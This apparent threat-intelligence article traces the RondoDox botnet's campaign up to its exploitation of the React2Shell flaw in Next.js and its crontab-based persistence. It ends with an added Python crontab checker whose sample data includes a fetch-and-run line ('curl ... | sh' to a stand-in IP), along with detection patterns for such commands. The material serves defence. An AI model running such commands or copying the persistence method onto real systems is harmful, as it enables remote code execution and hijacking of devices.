How Is RondoDox Exploiting the React2Shell Flaw?

The Rise of a New Threat: Understanding the RondoDox-React2Shell Connection

A persistent and increasingly sophisticated cyber threat known as the RondoDox botnet has been actively compromising Internet of Things (IoT) devices and web servers for over nine months, recently escalating its campaign by weaponizing a critical vulnerability. This new attack vector leverages React2Shell, a remote code execution flaw with a perfect 10.0 CVSS score, amplifying the botnet’s reach and impact. The following timeline dissects the strategic evolution of this campaign, from its initial reconnaissance to its current, large-scale exploitation of this severe flaw. Understanding this progression is crucial for organizations, especially as over 90,000 internet-facing instances remain vulnerable, highlighting a widespread and urgent security risk that demands immediate attention.

The RondoDox Campaign: A Timeline of Escalation

March – April 2025 – The Initial Reconnaissance Phase

The RondoDox campaign began discreetly, with its operators conducting initial reconnaissance and manual vulnerability scanning. During this early stage, attackers focused on methodically identifying potential targets and testing weaknesses in an exploratory, low-and-slow manner. This careful approach was designed to avoid detection while laying the essential groundwork for the more aggressive and automated attacks that would follow in the subsequent months.

April – June 2025 – The Mass Probing Phase

Building on their initial findings, RondoDox operators significantly ramped up their efforts, shifting from targeted exploration to daily mass vulnerability probing. The campaign’s scope broadened considerably to target a wide range of web applications, including popular content management systems like WordPress and Drupal, as well as common IoT hardware such as Wavlink routers. This phase marked a clear transition from careful exploration to high-volume, opportunistic attacks aimed at rapid expansion.

July – Early December 2025 – The Automation and Scale Phase

The botnet’s methodology evolved further as threat actors implemented hourly automated deployment on a massive scale. This critical shift maximized the campaign’s reach and operational efficiency, allowing the botnet to grow exponentially by continuously scanning for and infecting vulnerable systems without requiring manual intervention. It was during this period that RondoDox also integrated other known N-day vulnerabilities, such as CVE-2023-1389, into its arsenal to diversify its attack vectors.

December 2025 – The React2Shell Exploitation Phase

The campaign’s most alarming development occurred when its operators began leveraging the critical React2Shell flaw (CVE-2025-55182). Attackers initiated widespread scans to find vulnerable Next.js servers and, upon successful exploitation, dropped a sophisticated multi-stage payload. This payload included cryptocurrency miners, a botnet loader and health checker located at “/nuts/bolts,” and a variant of the notorious Mirai botnet, effectively hijacking the infected device and enslaving it into the attacker’s network.

Key Turning Points and Overarching Patterns

The RondoDox campaign’s most significant turning point was its adoption of the React2Shell vulnerability, which enabled a fresh and potent wave of infections on systems that may have been previously secure. This strategic move demonstrates a key pattern in modern botnet operations: the rapid weaponization of newly disclosed, high-impact flaws before organizations have a chance to apply patches. The overarching theme is one of constant evolution, as RondoDox continuously expands its arsenal to maximize its infection potential. Furthermore, this campaign highlights a notable gap in cybersecurity defense—the slow pace of patching—with tens of thousands of servers in the U.S. and Europe remaining susceptible long after a fix has been made available.

A Deeper Look: The Botnet’s Tactics and Defensive Measures

A closer examination of the RondoDox payload reveals a sophisticated design intended not only to infect systems but also to maintain absolute control. The “/nuts/bolts” component acts as an aggressive defense mechanism, systematically terminating competing malware and coin miners on a compromised system. It actively removes rival botnets, Docker-based payloads, and associated cron jobs to ensure its singular dominance. Moreover, it establishes persistence via “/etc/crontab” and continuously scans running processes to kill any non-whitelisted executables, effectively preventing reinfection by other threat actors. To mitigate this threat, experts strongly advise organizations to update Next.js to a patched version immediately, segment IoT devices onto dedicated VLANs, deploy a Web Application Firewall (WAF), and actively monitor for suspicious process execution while blocking known command-and-control infrastructure.
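One way to act on the crontab-persistence and process-monitoring points above, as an added example that is not from the article or from any vendor tooling: a small Python checker that parses an /etc/crontab in system format and flags entries that reference the “/nuts/bolts” path the article names, plus two generic persistence heuristics. The sample crontab, the 198.51.100.7 address and the /tmp/.x location are constructed for illustration, not taken from the campaign.

```python
import re

# Constructed sample in /etc/crontab format (schedule, user, command). The first
# entry is a normal Debian default; the last two are the kind of persistence the
# article describes. The /tmp/.x prefix before "/nuts/bolts" is an assumption.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot         root    /tmp/.x/nuts/bolts
*/5 * * * *     root    curl -s http://198.51.100.7/x.sh | sh
"""

# Indicator from the article ("/nuts/bolts" loader path) plus two generic heuristics:
# a downloader piped straight into a shell, and a program run from a temp directory.
KNOWN_PATHS = ("/nuts/bolts",)
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
TEMP_DIR_EXEC = re.compile(r"(^|[\s;&|(])/(tmp|var/tmp|dev/shm)/")
ENV_LINE = re.compile(r"^[A-Za-z_]\w*=")

def parse_crontab(text):
    """Return (line_no, schedule, user, command) tuples; skip comments, blanks, VAR=value."""
    entries = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):            # @reboot / @daily style schedule
            parts = line.split(None, 2)
        else:                               # five time fields, then user, command
            parts = line.split(None, 6)
            parts = [" ".join(parts[:5])] + parts[5:]
        if len(parts) == 3:                 # anything else is malformed; ignore it
            entries.append((no, *parts))
    return entries

def find_suspicious(entries):
    """Return (line_no, reason) for each entry matching an indicator or heuristic."""
    hits = []
    for no, _schedule, _user, command in entries:
        if any(p in command for p in KNOWN_PATHS):
            hits.append((no, "known RondoDox loader path"))
        elif PIPE_TO_SHELL.search(command):
            hits.append((no, "downloader piped into shell"))
        elif TEMP_DIR_EXEC.search(command):
            hits.append((no, "executes from world-writable directory"))
    return hits
```

Running `find_suspicious(parse_crontab(open("/etc/crontab").read()))` on a live host returns the flagged line numbers and reasons; the same heuristics apply to files under /etc/cron.d.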
